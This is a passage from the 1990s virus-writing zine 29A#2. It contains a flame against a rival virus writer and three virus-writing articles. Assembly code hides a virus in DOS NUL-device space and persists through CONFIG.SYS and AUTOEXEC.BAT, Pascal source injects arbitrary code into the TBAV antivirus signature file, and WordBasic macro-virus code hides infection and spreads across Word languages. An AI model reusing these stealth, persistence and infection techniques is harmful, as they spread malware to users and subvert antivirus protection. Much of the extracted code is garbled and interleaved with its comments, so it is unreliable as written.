this from him: - - - - - - - - - - - - - - - - - - - [...] The
magazine is about 1.4 meg, of articles. Unlike some 'virus'
magazines / music files to impress. - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - ->8 which about 99% of
which is actual we dont need 500k viewers / intros - - - - - - - -
- - - - - - - - ->8
A pretty modest boy, heh??? but that's not all. Besides this, we
all in the virus scene had to stand him claiming "IRG#8 is the best
zine about viruses ever released", being that a real offense to
VLAD and the great work they did during their presence in the
scene. Now it is when we all realise about why this boy i'm talking
about is so "well appreciated" among most of the mentally sane and
concious-of-what-they-say virus writers. Fortunately he retired and
left the scene. IRG died. And we all lived much better since that
happened, as we had to stand no longer any motherfucking candy
eater telling us shit about how cool he was. While he was
comfortably pulling himself home, we all were happily having a good
run of things in the virus scene. In fact everything was going
almost perfect. But you know perfection does not exist. And that's
why he briefly reappeared by june/july of this year, using other
nick and apparently trying to hide his previous identity, and to
dazzle the scene with a new virus he had written. This virus was
released via IRC (as far as i know) within a ZIP file which
contained, among others, a text file called "readme.1st", which
started this way: - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - ->8 [...] % Important % _____________ I do
not give permission to anyone to publish this virus in their Vx
zine. This means the fools who published the source to Zhengxi, 6
months after it was made publicly available, and kept rambling on
about they were the zine to release the source.. they know who they
are. Also, ugly children are not permitted to read this text. [...]
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - ->8 It's a pretty curious thing to see what may ENVY drive
people to do. Well, it is obviously about us, 29A, who published
the original source code of Zhengxi in 29A#1, in december 1996.
That's why i decided to use this section of the magazine to reply
such a stupid quote. So keep on reading my
answer for the child, same as if it were an e-mail reply: - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
->8 From : Mister Sandman/29A, To : The Soul Manager (previously
known as *********), About: Your big mouth Hi fool. > I do not
give permission to anyone to publish this virus in their Vx zine Do
you think i'd ever publish anything from you in 29A? not in this
life... > This means the fools who published the source to
Zhengxi, 6 months after > it was made publicly available, and
kept rambling on about they were the > zine to release the
source.. You mean the same ones who kicked your ass? ah, yeh, it's
us... well, i don't really mind a shit what you think or don't, but
i'll try to make things clear for the rest of the people who are
reading this. Zhengxi was first publically released in june 1996,
but only in its binary form. And it was only a few weeks before
29A#1 was released, in december 1996, when some fortunate VXers
could get the original source code for it, and that's what we
eventually published, with the agreement of its author, as at that
time Zhengxi was so far the most asked virus in the scene. And
that's why we say we were the first zine to release the source, as
it is the only truth. No one else did it before. Maybe this
reaction is the consequence of a frustrated attempt to be you and
your group the first ones to publish it, heh? > they know who
they are. In fact we even know who you are, despite your intention
to hide yourself under a new nick (The Soul Manager) and then talk
shit about us, instead of encouraging yourself to say what you
think with your original nick. Pathetic. With Zhengxi or without
it, you're still dead and i'm still Elvis.
Mister Sandman, chew my success. - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - ->8 I would finally like
to add a brief text in latin, the language which gives (actually
gave) his nick to the dork i'm talking about, to describe what he
exactly makes me think and the way i feel every time i hear about
him. Those who can speak/translate latin will surely enjoy it a
lot.
"Qvotienscvmqve tvvm cognomen avdio navseas sentio,
qvotienscvmque tvos viros lego vomire volo, et vomiam ac mingam ac
concvlcabo sepvltvra tva, qvod ipsa sicvt cognomen tibi fvit, atqve
in ea reqviesces... cvm moriaris... si reapse aliqvando
vixisti".
Despite my initial intentions, i was about to forget about
publishing this article, so it would not stand between the
friendship of one of the VXers i admire most, now a 29A member, and
the "guy" this article is all about, but the thing went suddenly
fixed, as soon as i had noticed about the fact that the infamous
"Soul Manager" had broken his... friendship?, with this friend of
mine just because he'd joined 29A. Pretty curious meaning of
friendship. It would be very easy to be ok in the VX side, among us
all (not as between AVers, because they have economy standing
between their interests and them) in the virus scene, but it seems
that many people don't want it to be so. Oh, and... he's giving out
all his shit as he's now changing his nick again so keep your eyes
open and watch any dork you meet out. Fuck drugs off and get your
rage in your ass, idiot.
Mister Sandman, bring me a dream.
Article separator > Mister Sandman/29A What is this article
used for? answer is nothing. Its functionallity is merely
esthetical, as it keeps the articles separated of the executable
files of the magazine. So why am i writing anything here? well,
there are still a few thingies which haven't been told in the rest
of the articles and result kinda interesting or funny to read. For
instance, do you know that: 666 * 3 = 1998? it seems like this is
gonna be a magic year for the VX side. Will AVers die? will they be
satanized? or will they maybe get medieval in their asses? who
knows :) Other thing you should note is the fact that we have not
included any virus index in this issue. It seemed to us pretty
stupid as they are described in detail both in their corresponding
source and in the "29A Labs", our website... describing them one
more time would be a pain. There are also one couple thingies
pending... the password for the secret area of our previous issue
was "29akewl". We accept no complains, we didn't have much
imagination at that time and were quite hurried, so... :P The other
pending thing is the importance of the new features of our improved
file browser. Now it is possible to load it with or without mouse,
with or without intro, and so on. And once loaded, when reading any
article, you will be able to choose between smooth or hard scroll.
Now it is also possible to run the payload of any virus included in
our zine when having loaded its source code from within the file
browser. It is still possible, btw, to UUdecode binary files,
albeit we have not implemented this feature yet. And finally, the
screen saver can be loaded now just by pressing a hot-key. And note
this is a DOS application, so we don't make responsible of the way
it may work under *your* Windows95. At least under ours it works
ok.
Optional parameters to 29A#2.EXE i........... Don't load intro
(argh!) m........... Enable mouse inside browser s...........
Disable smooth scroll
File browser internal commands #........... Activate screensaver
b........... Activate boss screen g........... Run payload (if
available) s........... Dis/able smooth scroll u...........
UUdecode binary (i/a) F1.......... Further help (lame!)
Wish us some happy VX holidays and enjoy the zine!
Mister Sandman, bring me a dream.
Playing "Hide and Seek" > "Q" the Misanthrope It is a game of
one-up-man-ship between the VX and the AV community. VX seems to be
winning this battle but is also forcing new improvements. VX
creates virus. AV creates scan strings. VX creates mutation. AV
creates smart detectors. VX creates stealth. AV counters that with
direct access. VX creates tunneling. AV stops that. VX creates
tracing. AV stumbles. VX creates retro. AV stumbles. VX creates
Stop AV from memory scanning. AV stumbles. VX creates macro
viruses. AV goes nuts. VX creates new places to hide from AV. AV
will probably stumble again.
Hide in NUL-Space Wouldn't it be great to hide in a file that
could not be accessed. You can. There are little things called
device drivers in your PC. COM1, COM2, LPT1 and CON are examples.
NUL is also a device that serves little purpose except do nothing.
An example of this: COPY *.* NUL will read all the files for errors
and copy them into NUL-Space (nowhere). Try to create a file by the
name of NUL, what could you do with it? An experiment is necessary.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - ->8 c:\>debug -a mov ah,52 int 21 int 3 -g AX=5200
BX=0026 CX=0000 DX=0000 SP=FFEE BP=0000 SI=0000 DI=0000 DS=0C9C
ES=00C9 SS=0C9C CS=0C9C IP=0104 NV UP EI PL NZ NA PO NC 0C9C:0104
CC INT 3 - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - ->8 ES:BX points to the DOS list of lists. From
Ralf Browns interrupt list: - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - ->8 Format of List of Lists:
Offset Size Description 00h DWORD pointer to first Drive Parameter
Block 04h DWORD -> first System File Table 08h DWORD pointer to
active CLOCK$ device's header [...] 22h 18 BYTEs actual NUL device
driver header (not a pointer!) NUL is always the first device on
DOS's linked list of device drivers - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - ->8 ES:BX+22h is what is
of interest. Back to debug. - - - - - - - - - - - - - - - - - - -d
es:48l12 00C9:0040 00 00C9:0050 CD 0D 4E 55 4C 20 20 20-20 - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
->8 00 A6 C9 04 80 C7 0D ........ 20 ..NUL - - - - - - - - - - -
- - - - - - ->8
See the word NUL at es:bx+2Ch. Lets change it to AUTOEXEC. - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
->8 -e es:52 "AUTOEXEC"
-q - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - ->8 Back to DOS. - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - ->8 c:\>type
c:\autoexec.bat c:\>ren c:\autoexec.bat test.bat Path not found
c:\>del c:\autoexec.bat Access denied - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - ->8 Notice what
happened when AUTOEXEC.BAT was in NUL-Space. It could not be read,
renamed or deleted. Wouldn't this be a great way to protect our
virus. Ralf Browns list showed that the actual NUL device was only
18 bytes long. Could you just make another 18 byte NUL device by
another name? The answer is YES! Here is the device format from
Ralf Brown: - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - ->8 Format of DOS device driver header: Offset
Size Description 00h DWORD pointer to next driver, offset=FFFFh if
last driver 04h WORD device attributes (see below) 06h WORD device
strategy entry point call with ES:BX -> request header 08h WORD
device interrupt entry point 0Ah 8 BYTEs blank-padded character
device name Bitfields for device attributes: Bit(s) Description 15
set (indicates character device) 14 IOCTL supported 13 (DOS 3.0+)
output until busy supported 12 reserved 11 (DOS 3.0+)
OPEN/CLOSE/RemMedia calls supported 10-8 reserved 7 (DOS 5.0+)
Generic IOCTL check call supported 6 (DOS 3.2+) Generic IOCTL call
supported 5 reserved 4 device is special (use INT 29 "fast console
output") 3 device is CLOCK$ 2 device is NUL 1 device is standard
output 0 device is standard input - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - ->8 From the debug
experiment: - - - - - - - - - - - - - - - - - - -d es:48l12
00C9:0040 00 00C9:0050 CD 0D 4E 55 4C 20 20 20-20 - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - ->8 00 A6 C9
04 80 C7 0D ........ 20 ..NUL - - - - - - - - - - - - - - - - -
->8
We see that the next device in the chain is at C9A6:0000h,
attributes are 8004h and that the strategy and interrupt entry
points are 00C9:0DC7h and 00C9:0DCDh. The strategy and interrupt
points for a NUL device just need to point to a RETF (they really
could point anywhere since they are not used). To make our own NUL
device we can do something like this:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - ->8 [...] mov ah,52h ;get list of lists int 21h cld ;get
address of next device in ds:si lds si,dword ptr es:[bx+22h] push
cs ;point to our device pop es mov di,offset virus_device movsw
;copy device chain to our device movsw ;then hook in our device mov
word ptr ds:[si-02h],cs mov word ptr ds:[si-04h],offset
virus_device [...] virus_device dd -1h dw 8004h ;NUL character
attributes dw return_far ;strategy pointer dw return_far ;interrupt
pointer db "VIRUS " ;any file name your want in NUL-Space [...]
return_far: retf - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - ->8 When your virus starts, have your
virus create a first generation virus whose host is the standard CD
20 (terminate immediately) before it starts infecting. Name that
virus C:\FDGDIKGA.PKB (pseudo random name and extension but should
be same for all infections on that PC). This name could be derived
from the drive C: serial number: - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - ->8 [...] mov ax,6900h
;get drive serial number mov bx,0003h ;drive C: push cs pop ds mov
dx,offset info ;point to where serial number will be int 21h
;create file name from the drive C: serial number cld mov si,offset
serialnumber mov di,offset device_name mov cx,0004h ;loop 4 times
get_serial: lodsb ;get start of serial number push cx mov cl,04h
;inner loop 4 times make_file: sub al,cl ror al,cl ;pseudo random
letter mov bl,al and bl,0fh add bl,"A" ;create letter from A to P
mov byte ptr ds:[di],bl inc di ;save it and move pointer loop
make_file pop cx loop get_serial mov byte ptr ds:[file_dot],"."
;restore dot mov byte ptr ds:[asciz_nul],00h ;restore nul mov
dx,offset file_name ;now create virus by name at DS:DX [...] info
dw 0 serialnumber dd 0 ;drive C: serial number
db file_name db device_name db file_dot db asciz_nul db - - - -
- - - - - - - -
19 dup(0) "C:\" "VIRUS000" ".000" 00h,00h,00h - - - - - - -
-
;misc junk ;pseudo virus name goes here ;with pseudo extension -
- - - - - - - - - - - - - - - ->8
Hide it with the System and Hidden attribute, maybe even
Read-Only. Now create a NUL device by the name of FDGDIKGA (same as
pseudo random file name). Add this line to CONFIG.SYS:
INSTALL=C:\FDGDIKGA.PKB Now start infecting. Go memory resident
(you really only need to have the 18 bytes of your NUL device
resident). What will now happen is magic. When the PC reboots there
will load a program that doesn't have an executable extension so
most AV programs won't even try to scan it. If they do they won't
be able to read it or delete it because it is in NUL-Space. The AV
people will be able to add the scan string for your virus and
remove all the children created by it but they will not get the
virus in NUL-Space. It will continue to infect again and again.
Maybe only have it infect on Fridays or on the 13th of each month
so it will appear that the virus has gone away but later it
magically returns.
Hiding in NUL-Space and Windows 95 It works just fine with one
notable exception; SCANDSKW.EXE that is automatically launched by
the System Agent detects that there is a device by the same name as
a file and will flag it. The solution is simple. Create another NUL
device by the name of SCANDSKW. This stops SCANDSKW from working
but doesn't flag an error. Note: when going resident with the 18
byte NUL device, you might want put it in the same location as the
AUX device. This device is never ever sed and is just wasting
space. AUX is another name for COM1. PRN could used but some older
programs actually use it. LPT3's 18 bytes also could used. The way
to find the AUX device is to search the device chain: to ube be
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - ->8 mov ah,52h ;get list of lists int 21h add bx,22h
;point to NUL device check_end: cmp word ptr es:[bx],-1 ;end of
chain? je end_chain cmp word ptr es:[bx+0ah],"UA" jne next_device
;Look for "AUX " cmp word ptr es:[bx+0ch]," X" jne next_device
[...] ;found AUX device at ES:BX change the name at ES:BX+0Ah to
whatever you want [...] mov word ptr es:[bx+04h],8004h ;set NUL
device jmp short end_chain next_device: les bx,dword ptr es:[bx]
;get next device in chain jmp short check_end end_chain: - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
->8 To see the power of NUL-Space, try this in Windows 95:
md\"NUL It locks the computer completely up. ".
Hide in Cypher Text PkZip has the ability to password protect
ZIP files. This our advantage. Have the virus run this:
can be used to
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - ->8 PKZIP -SPASSWORD C:\VIRUS.ZIP C:\VIRUS.COM - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
->8 And add this to the AUTOEXEC.BAT: - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - ->8 @ECHO OFF
PKUNZIP -O -SPASSWORD C:\VIRUS.ZIP C:\VIRUS.COM - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - ->8 This
will allow multiple reinfections but the source will not be found
with a virus scanner because it will not be able to expand the ZIP
file. If this is over your head, save it and come ter. Have fun in
NUL-Space. Dear AV community, You are in check! It is now your
move. back to it when you are smar-
"Q" the Misanthrope
TBSCAN.SIG infection > Malware TBAV uses so called AVRs in
order to add detection routines for catching polymorphic viruses
that avoid its generic decryption engine. Such an AVR is just
native code which is loaded and... executed! by TbScan, and is
stored along with the virus signatures in the signature file
TBSCAN.SIG. This signature file begins with a 128-byte-long header,
in which we can find the amount of 16-byte-long blocks (paragraphs)
needed by the AVRs at offset 70h, stored as a word (2 bytes). At
offset 72h is stored the overall size of the virus signatures, as a
doubleword. That's all we need to know about the TBSCAN.SIG header
in order to trojanize or infect it. The AVRs are located just after
the above contents in the file, and this is the place where our
virus or trojan has to be inserted. Since i do not know all the
specifications of it, we can just take what is already there and
modify it so there will be enough space for the new AVR code. Each
AVR has a 16-byte-long header. The word at offset 0ch of this AVR
header holds the size of the AVR code, including its header size.
Just after this header, the AVR code (wich we'll describe later)
follows. And after this code we can find the virus name in ASCIIZ
format. The virus name size (including the ending 0) is stored in a
byte at offset 0ah of the AVR header. The total size
(header+code+name) is stored as well in a word at offset 0eh in the
header. Finally, the AVR code and the virus name are encrypted by a
bytewise xor with 44h. IAVR, the program included below, does all
this stuff so you can insert any code you want as an AVR in your
TBSCAN.SIG file. You just have to call it 'IAVR
filename_of_AVR_code'. If you don't specify any filename, IAVR will
keep on waiting for you to type in the AVR code. Then, after it has
read the code, IAVR will prompt for the virus name your AVR has to
be associated with. The new signature file will then be written to
a new file whose name will be TBS.SIG. And now, before including my
program IAVR, let's have a look at the format of any AVR code. It's
a quite simply relocateable code. If it returns a carry flag, it's
telling TbScan that the virus was found. The AVR code has to be
ended with a retf instruction. The rest is just normal code, so you
can program as usual and insert anything you want there. This is an
example of an AVR which triggers all the files as infected: - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
->8 model tiny .code org 100h start: stc retf end start - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
->8 And finally, the Pascal source of my IAVR program, which is
able to add any AVR to TBSCAN.SIG, writing the resulting file as
TBS.SIG. You can find the compiled executable version of this
program in the \FILES directory of this issue of 29A. - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
uses Crt; const Name : String = 'Default_Virus';
type PWord = ^Word; var F1,F2,F3 : File; ML,L,i,BP1 : word;
OP,Size_ : LongInt; Buffer : Array[0..$2000] of Byte; begin
Size_:=0; assign(F1,'tbscan.sig'); Reset(f1,1);
assign(F2,'tbs.sig'); rewrite(f2,1); assign(F3,ParamStr(1));
reset(F3,1); blockread(F1,Buffer,$80); blockwrite(F2,Buffer,$80);
blockread(f1,buffer,$1fff); blockread(f3,buffer[$10],$2000,L);
L:=L+$10; Buffer[$0c]:=L and $FF; Buffer[$0d]:=L div $100;
Write('Name :'); Readln(Name);
{ { { { { { { { {
open original signature file create new signature file open file
with code to insert read header of signature file and simply write
it to new one read first 1FFF byte of orig. read upto 2000 byte of
code add size of header for AVR write header size into buffer
} } } } } } } } }
{ ask for a name for the virus } { thats detected by the new AVR
} For i:=1 to Ord(Name[0]) do Buffer[L+I-1]:=Ord(Name[i]); { write
it into buffer } Buffer[L+Ord(Name[0])]:=0; { and end it with a
zero } L:=L+Ord(Name[0])+1; { add length of name to size }
Buffer[$0a]:=Ord(name[0])+1; { store length of name }
Buffer[$0e]:=L and $FF; { and full length of AVR } Buffer[$0f]:=L
div $100; for i:=$10 to L do Buffer[I]:=Buffer[I] XOR $44; {
encrypt the new AVR } blockwrite(f2,buffer,L); { and write it to
new sig.-file } ML:=L; seek(f1,$80); { seek back to top of original
} { AVRS } { now write the rest of the original signature file to
the new one } L:=$2000; While L=$2000 do Begin
BlockRead(F1,Buffer,L,L); BlockWrite(F2,Buffer,L); End;
Seek(F2,$80); Repeat OP:=FilePos(f2); blockread(f2,buffer,$1fff);
if Buffer[1]=$FF then begin { begin right after header again }
{ save position we have in file } { read a bit from file } { is
it an cotrol entry ? } { yes, is control entry } for i:=$10 to
Buffer[$0e]+word(buffer[$0f])*256 do Buffer[I]:=Buffer[I] XOR $44;
{ decrypt it } i:=Buffer[$0c]+word(buffer[$0d])*256; { ??? }
OP:=OP+Buffer[$0e]+word(buffer[$0f])*256; { add size of entry to
position } { in file } Size_ := Size_ +
Buffer[$0e]+word(buffer[$0f])*256; { summarize all sizes }
Seek(F2,OP); { seek to position after entry } end; Until Eof(F2) or
( Buffer[1]$FF ); If Not( Eof(F2) ) then Begin BP1 := 0; { now the
signatures }
{ repeat until end of this } { signature-block } Size_ := Size_
+ Buffer[BP1+8] + Buffer [BP1+7] + 10; { add size of entry }
BP1:=Buffer[BP1+8]+$A+BP1+Buffer[BP1+7]; { here too } if
BP1>=$1E00 then begin { we need a new part of file to } { read
sometimes } Seek(F2,OP+LongInt(BP1)); OP:=OP+LongInt(Bp1);
BlockRead(F2,Buffer,$2000); BP1:=0; end; end; Size_ := Size_ + $81;
{ somehow 129 byte was missed } Seek(F2,$70);
BlockRead(F2,Buffer,6); { read 6 byte from offset $70 }
Seek(F2,$70); PWord(@Buffer[0])^:=PWord(@Buffer[0])^ + ( (ML+15)
DIV 16) ; { add para size of new AVR code } Buffer[2]:=Size_ and
$FF; { writew new size of signatures } Buffer[3]:=( Size_ SHR 8 )
and $FF; Buffer[4]:=( Size_ SHR 16 ) and $FF; Buffer[5]:=( Size_
SHR 24 ) and $FF; BlockWrite(F2,Buffer,6); { write the 6 byte back
to file } End; Close(F1); Close(F2); Close(F3); end. - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Malware
while (Buffer[BP1]0) do begin
Macro virus trickz > Jacky Qwerty/29A This article is not
intended to be a tutorial for macro virus writin. It simply states
some common problemz and known limitationz with actual macro virii,
then sugests solutionz and provides some code examplez for them.
The reader should be already familiar with some of the conceptz
surroundin macro virii stuff. If not, i sugest to read first a
"real" tutorial about the subject and then jump back to this
article.
Index 1. Introduction 2. The "SaveAs" problem 2.1. The "SaveAs"
solution 2.2. The "SaveAs" example 3. The "MultiLanguage suport"
problem 3.1. The "MultiLanguage suport" solution 3.2. The
"MultiLanguage suport" example 4. Final Note 5. Disclaimer
1. Introduction One day while i was surfin the Web, unexpectedly
found a couple of linkz containin Word macro virii stuff. After
havin programed some DOS virii and researched about PE infection,
one has to admit that the idea of a virus writen in WordBasic or
VBA... mmm... well, sounds a bit stupid >8P (DS1, NJ: dont get
mad... >8D) Indeed, macro virii seem stupid once u write one,
but at that moment i had written none. After i downloaded and
played with some of them, i actually understood not only how stupid
macro virii were, but also Microsoft programerz. They're all
clueless on what *security* means :)
2. The "SaveAs" problem Just when i started to write my own
macro virus, my atention was caught by an interestin mesage posted
to alt.comp.virus. The topic was about that typical nuisance with
macro virii that reveals their presence: the "SaveAs" problem. As i
had thought, it was posible to overcome this, and that mesage from
an expert AVer (well ehem) had just confirmed it. The "SaveAs"
problem occurs when u try to save any infected document with
another name usin the "FileSaveAs" command. After the "SaveAs"
dialog box appears, u cant change the drive, nor the directory
path, nor the format type. Word always saves your document in the
"templatez" directory, unablin u to change it. This is bad for the
common clueless user and bad for the virus too, as it reveals its
presence by tellin him somethin is wrong. It also reduces its
chancez to spread coz now the user cant take home his (infected)
document as long as Word doesnt let him save documentz to his
floppy disk, due to the "SaveAs" problem. I have thought of
diferent wayz to overcome this, however i'll discuss the method i
actually implemented in my WM.CAP virus.
2.1. The "SaveAs" solution
How do we solve this problem then? easy, very easy once we
understand what an infected document really is. We cant forget that
an infected document is really a "template", that why Word doesnt
let us change the drive, nor the directory path, nor the format
type. Becoz its a "template" and templatez belong to the templatez
directory! Ok, but what if we make Word think that the infected
document, sorry i meant the infected "template", is a genuine Word
document? this would allow the user to select the drive, path and
any type for the document! right? right! but how? Easy again, once
we understand why Word provides "templatez": to make user's life
easier by creatin documentz based on such templatez, got it? All we
have to do is create a new document based on our active infected
template! in other wordz we have to "emulate" the "SaveAs" function
as if Word were saving a genuine document. Lets write some code to
ilustrate.
2.2. The "SaveAs" example Sub FileSaveAs On Error Goto
endFileSaveAs Dim dlg As FileSaveAs GetCurValues dlg If dlg.Format
1 Then Dialog dlg FileSaveAs dlg Infect(dlg.Name) Else TempWindow =
Window() OriginalName$ = dlg.Name FileNew .Template = FileName$()
On Error Goto CloseDoc GetCurValues dlg dlg.Name = OriginalName$
Dialog dlg FileSaveAs dlg On Error Goto endFileSaveAs
Infect(dlg.Name) If TempWindow >= Window() TempWindow =
TempWindow + 1 EndIf WindowList TempWindow CloseDoc: FileClose 2
End If endFileSaveAs: End Sub ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
' ' ' ' ' ' ' ' ' Our "FileSaveAs" macro Declare dlg as FileSaveAs
dialog box Get current values into dlg Not a template? (i.e. not
infected?) No, a clean document, show box Save the new document
Infect it! go! It's a template (i.e. it's infected) Get current
window (template) Get original document name Create new doc based
on template! Now on: if any error close new doc Get current values
for new doc Change doc name for original one Ok, show FileSaveAs
dialog box Save the new document Now on: if any error just go Ok,
infect new document Get old template window number Make it the
active window Close it without promptin We're done! "SaveAs"
problem fixed!
The trick here is that the "FileSaveAs" subroutine behaves
diferently acordin to the object bein saved. If the object is a
genuine Word document (i.e. not infected), the routine simply shows
the "SaveAs" dialog box and tries to infect it afterwardz. If the
object bein saved is a "template" (i.e. perhaps an infected
document) then the routine first creates a new document based on
that active template (which is actually the infected document
itself) and then shows the "SaveAs" dialog box from this newly
created clean document. This time Word allows to choose the format
type, drive letter and directory namez. After the user chooses the
document name and saves it, the routine simply infects the
document, swaps to the window containin the old template (i.e. the
old infected document) and finally closes it leavin open the new
"Saved-As" document just as Word itself does.
If at this point u're wonderin why we created a new "empty"
document from the template, then u probably need some background
info in Word macroz and templatez. The new created document is NOT
"empty" as it was created from a template which was not empty.
Remember that this template is really our infected document and as
a result our new created document will contain the same text stuff
as the template. Remember also the definition of what a "template"
is and why we use them.
3. The "MultiLanguage suport" problem This is a dificult topic
and several diferent aproachez have been tried and implemented by
different VXers in order to overcome it. However as to this writin,
i still havent seen a single *reliable* multilanguage macro virus.
The Wazzu virus consisted of a single automacro: AutoOpen. This
makes it language-independent indeed but it still has the "SaveAs"
problem, big deal. The "MultiLanguage suport" problem has to do
with the fact that MS Word is available in diferent languagez and
flavorz for diferent platformz. Whenever we give a macro the name
of a menu item, Word will actually execute the code contained in
such macro whenever the user clicks or presses the menu item
asociated with it. However if the user executes the same action
(clicks the same menu item) under another Word language, the
asociated macro won't be executed at all becoz it doesnt match the
menu item name as it was written in another language, u see? For
example supose in english Word we program the "FileOpen" macro to
do whatever action. Whenever we click the "File/Open" item, our
macro will be executed. However supose we copy (unchanged) the same
macro to another Word language, say spanish. Under this Word
language the asociated file menu item changes now to
"Archivo/Abrir". If we click this menu item, our old "FileOpen"
macro won't be executed at all. However if we rename the macro to
"ArchivoAbrir", this time it will execute just fine. This is what
is known as the "MultiLanguage suport" problem.
3.1. The "MultiLanguage suport" solution (without AutoMacroz)
The best aproach to obtain multilanguage suport without losin
control over the enviroment is interceptin the file menu related
macroz, at least the "FileSaveAs" macro so we can fix the "SaveAs"
problem. The best solution i came up with after thinkin a bit among
the diferent alternativez was to intercept the file macroz directly
acordin to the especific Word language instaled. This is not a
dificult task, however what proves to be somewhat complicated is
guessin out the correct macro name for the respective file menu
item. If this step is done incorrectly, some file menuz will end up
doin diferent actionz other than expected. For instance, the
"FileSave" macro could end up callin "FileClose", thus closin the
document instead of saving it or viceversa. In order to get the
macro namez for the actual Word language instaled, we must use the
"MenuItemMacro$" function. This function gives us the macro name
for a given menu item inside a menu, asumin we know of course which
menu this menu item refers or belongs to and knowin the menu item
name or the menu item position inside this menu itself. Heh are u
drowsy? =8-S. This is precisely the reason why this method is still
not 100% reliable. We must asume fixed menu item positionz for the
menu itemz we wanna hook. In any Word language from any standard
Word instalation we have the followin scenario (equivalent spanish
macroz are also shown):
English FileOpen FileClose FileSave FileSaveAs
Spanish ArchivoAbrir ArchivoCerrar ArchivoGuardar
ArchivoGuardarComo
Menu 1 (File) 1 (File) 1 (File) 1 (File)
Menu item position 2 3 5 6
This is precisely the method implemented in the WM.CAP virus in
order to work in any Word language. It created aditional macro
namez with same body but diferent name -acordin to the actual Word
language instaled- for a given macro function. The fact that the
macro code remains the same in any Word language is not a problem.
The macro interpreter inside Word is "universal", meanin that it
will execute correctly the WordBasic or VBA instructionz inside the
macroz without carin about the actual Word language instaled. It
needs however to refer to valid existin macro namez or labelz. As
macro namez change for a given especific Word language, we must be
very careful NOT to include any reference to a language-dependent
macro name inside any of our file related macroz. This is the
reason why such file related macroz inside WM.CAP are just short
stubz ("wraperz") that jump to other subroutinez inside the CAP
macro itself. Before showin an example to the "MultiLanguage
suport" method, i must warn once again that this method is not 100%
reliable. It all depends on how much the user has customized his
Word menuz and other setingz. It should however work just perfect
on those Wordz havin the factory standard setingz which gracely
share all Word instalationz by default. Again in some especific
user-customized Word instalationz, the latter method can easily
mess up some of the file related macroz, resultin in unexpected
behavior and weird funny actionz. Here follows the "MultiLanguage
suport" example.
3.2. The "MultiLanguage suport" example Dim Shared MacroName$(N)
Sub MAIN [...] MacroName$(2) MacroName$(3) MacroName$(5)
MacroName$(6) ' Array of stringz to hold the macro namez ' Main
subroutine = = = = "FileOpen" "FileClose" "FileSave" "FileSaveAs" '
' ' ' "FileOpen" "FileClose" "FileSave" "FileSaveAs" at at at at
position position position position 2 3 5 6 in in in in file file
file file menu menu menu menu
FileMenu$ = MenuText$(0, 1)
' Get name for file menu ("&File")
For MacroNumber = CountMacros(1) To 1 Step - 1 Position = 0
NameOfMacro$ = MacroName$(MacroNumber, 1) Select Case
MacroDesc$(NameOfMacro$) Case "FileOpen" Position = 2 Case
"FileClose" Position = 3 Case "FileSave" Position = 5 Case
"FileSaveAs" Position = 6 End Select If Position Then ' ' ' ' ' ' '
'
' Process each macro ' No position by now ' Get macro name ' Get
description of ' macro name Description = "FileOpen" ? then
position in file menu = 2 Description = "FileClose" ? then position
in file menu = 3 Description = "FileSave" ? then position in file
menu = 5 Description = "FileSaveAs" ? then position in file menu =
6
' If position in file menu was found then..
LocalMacro$ = MenuItemMacro$(FileMenu$, 0, Position)
' Get localized ' macro name If Left$(UCase$(LocalMacro$),
Len(MacroName$(Position))) UCase$(MacroName$(Position)) ' If local
macro name is And ' diferent from english name Left$(LocalMacro$,
1) ' and local macro name is NOT "(" ' a separator "(.." then Then
MacroCopy F$ + ":" + NameOfMacro$, LocalMacro$, -1 End If End If
Next ' Copy macro to ' localized ' macro name
' Process next macro
The objective in the previous example shows for itself. We're
tryin to get the file related macro namez for any localized version
of Word other than english. If these file related macroz are
located in the exact position where we expect them to be in the
file menu (very likely), then the above example will do its work.
Probably at this point u're wonderin what has the macro description
field to do in all this mess. Heh, well, the field proves to be
very useful for some purposez other than simply describin what the
macro does. The macro description field can be used to hold
generation countz and self-recognition paternz, among other thingz.
In the above example however, the description field mite not be
necesary at all. Its purpose is simply to identify a given file
related macro in order to assign a position for it in the file
menu. But u could argue this can be done as well simply comparin
the macro name retrieved from the "MacroName$" function with the
required english macro name. Yes, u could, and it would work, as
long as these english file related macroz keep stayin in the
infected document. But u see, macro corruption, deletion and
snatchin of macros are common nowadayz between macro virii due to
the increasin number of existin samples of themselves. Becoz of
this, the use of the macro description field (whenever posible) to
recognize english or equivalent localized macro namez, makes the
virus much more robust to macro corruptionz or undesired macro
deletionz.
4. Final note This article was written one or two months after
Microsoft released its long expected Office'97, containin Word'97.
